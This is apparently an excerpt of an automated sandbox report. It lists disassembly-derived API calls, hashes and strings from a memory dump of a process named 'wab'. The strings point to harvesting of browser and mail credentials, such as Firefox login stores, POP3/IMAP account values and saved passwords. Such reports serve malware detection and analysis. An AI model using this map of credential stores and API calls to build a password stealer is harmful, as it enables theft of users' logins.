                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                            APIs
                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                              • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                              • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                            • strlen.MSVCRT ref: 0040F139
                                            • strlen.MSVCRT ref: 0040F147
                                            • memset.MSVCRT ref: 0040F187
                                            • strlen.MSVCRT ref: 0040F196
                                            • strlen.MSVCRT ref: 0040F1A4
                                            • memset.MSVCRT ref: 0040F1EA
                                            • strlen.MSVCRT ref: 0040F1F9
                                            • strlen.MSVCRT ref: 0040F207
                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                            • _mbscpy.MSVCRT ref: 0040F2CD
                                            • _mbscpy.MSVCRT ref: 0040F30E
                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                            • API String ID: 1613542760-3138536805
                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                            • API String ID: 1012775001-1343505058
                                            • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                            • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                            APIs
                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoad
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                            • API String ID: 2449869053-232097475
                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                            APIs
                                            • wcsstr.MSVCRT ref: 0040426A
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                            • _mbscpy.MSVCRT ref: 004042D5
                                            • _mbscpy.MSVCRT ref: 004042E8
                                            • strchr.MSVCRT ref: 004042F6
                                            • strlen.MSVCRT ref: 0040430A
                                            • sprintf.MSVCRT ref: 0040432B
                                            • strchr.MSVCRT ref: 0040433C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                            • String ID: %s@gmail.com$www.google.com
                                            • API String ID: 3866421160-4070641962
                                            • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                            • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                            • API String ID: 2360744853-2229823034
                                            • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                            • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                            APIs
                                            • strchr.MSVCRT ref: 004100E4
                                            • _mbscpy.MSVCRT ref: 004100F2
                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                            • _mbscpy.MSVCRT ref: 00410142
                                            • _mbscat.MSVCRT ref: 0041014D
                                            • memset.MSVCRT ref: 00410129
                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                            • memset.MSVCRT ref: 00410171
                                            • memcpy.MSVCRT ref: 0041018C
                                            • _mbscat.MSVCRT ref: 00410197
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                            • String ID: \systemroot
                                            • API String ID: 912701516-1821301763
                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                            APIs
                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                            • strchr.MSVCRT ref: 0040327B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringstrchr
                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                            • API String ID: 1348940319-1729847305
                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                            • API String ID: 3510742995-3273207271
                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                            APIs
                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                            • String ID:
                                            • API String ID: 3642520215-0
                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                            APIs
                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                            • GetDC.USER32(00000000), ref: 004072FB
                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                            • String ID:
                                            • API String ID: 1999381814-0
                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                            • API String ID: 1297977491-3883738016
                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: __aulldvrm$__aullrem
                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                            • API String ID: 643879872-978417875
                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                            APIs
                                            • memset.MSVCRT ref: 0040810E
                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                              • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                            • API String ID: 524865279-2190619648
                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                            • String ID: 0$6
                                            • API String ID: 2300387033-3849865405
                                            • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                            • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _mbscat$memsetsprintf
                                            • String ID: %2.2X
                                            • API String ID: 125969286-791839006
                                            • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                            • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                            APIs
                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                            • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                              • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                            • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                            • String ID: ACD
                                            • API String ID: 1886237854-620537770
                                            • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                            • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                            APIs
                                            • memset.MSVCRT ref: 004091EC
                                            • sprintf.MSVCRT ref: 00409201
                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                            • String ID: caption$dialog_%d
                                            • API String ID: 2923679083-4161923789
                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                            • memset.MSVCRT ref: 00410246
                                            • memset.MSVCRT ref: 00410258
                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                            • memset.MSVCRT ref: 0041033F
                                            • _mbscpy.MSVCRT ref: 00410364
                                            • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                            • String ID:
                                            • API String ID: 3974772901-0
                                            • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                            • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                            APIs
                                            • wcslen.MSVCRT ref: 0044406C
                                            • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                            • strlen.MSVCRT ref: 004440D1
                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                            • memcpy.MSVCRT ref: 004440EB
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                            • String ID:
                                            • API String ID: 577244452-0
                                            • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                            • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                            APIs
                                            • memset.MSVCRT ref: 0040C02D
                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                              • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                              • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                              • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                            • API String ID: 2726666094-3614832568
                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                            • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
